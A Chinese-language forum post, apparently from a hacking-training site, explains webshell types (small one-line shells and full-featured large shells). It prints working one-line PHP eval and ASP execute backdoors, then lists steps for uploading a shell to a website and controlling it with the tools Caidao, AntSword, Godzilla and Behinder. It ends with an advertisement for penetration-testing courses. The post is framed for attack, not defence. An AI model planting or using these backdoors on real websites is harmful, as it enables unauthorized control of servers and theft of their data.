webshell

[复制链接]
发表于 2025-11-16 16:19:34 | 显示全部楼层 |阅读模式
webshell分类


小马:
功能简单,需要配合客户端使用;代码量通常在一行左右,不超过10行;隐蔽性强,容易通过变形隐藏特征,绕过过滤。

大码:
功能完善,直接使用浏览器即可利用,代码量通常较大,隐蔽性相对较弱,代码量大,通常需要通过加密等方式来隐藏特征。



使用说明:
小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。通过小马上传大马,这时候有个疑问了,那不是多此一举了,为什么要用小马来上传大马,而干嘛不直接上传大马用好了。其实这里是因为小马体积小,有比大马更强的隐蔽优势,而且有针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做留备用后门等



小码类别:
php小码:
<?php @eval($ POST['a ])?>asp小码:
<%execute(request("a"))%>jsp、.net等。


大码类别:
php大马代码:
截图202511160819262952.png


页面展示:
截图202511160820159178.png

ASP大马
截图202511160820573932.png
页面展示
截图202511160821231346.png

webshel利用工具
菜刀
1.上传小马到网站
2.利用菜刀连接小马
3.管理网站

截图202511160822315192.png

截图202511160823246223.png

蚁剑-需要初始化后使用
1.上传小码到网站
2.利用蚁剑连接小码
3.操控网站
截图202511160824264877.png

截图202511160824435992.png


哥斯拉-需要java环境运行
1.生成木马文件并上传到网站
2.利用哥斯拉连接木码
3.管理网站

截图202511160825418124.png
截图202511160825526823.png
截图202511160826051306.png

冰蝎-需要java环境运行
1.上传server目录中的木码到网站
2.利用冰蝎连接木码
3.管理网站

截图202511160826436445.png

截图202511160826576956.png
必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:19 , Processed in 0.084972 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表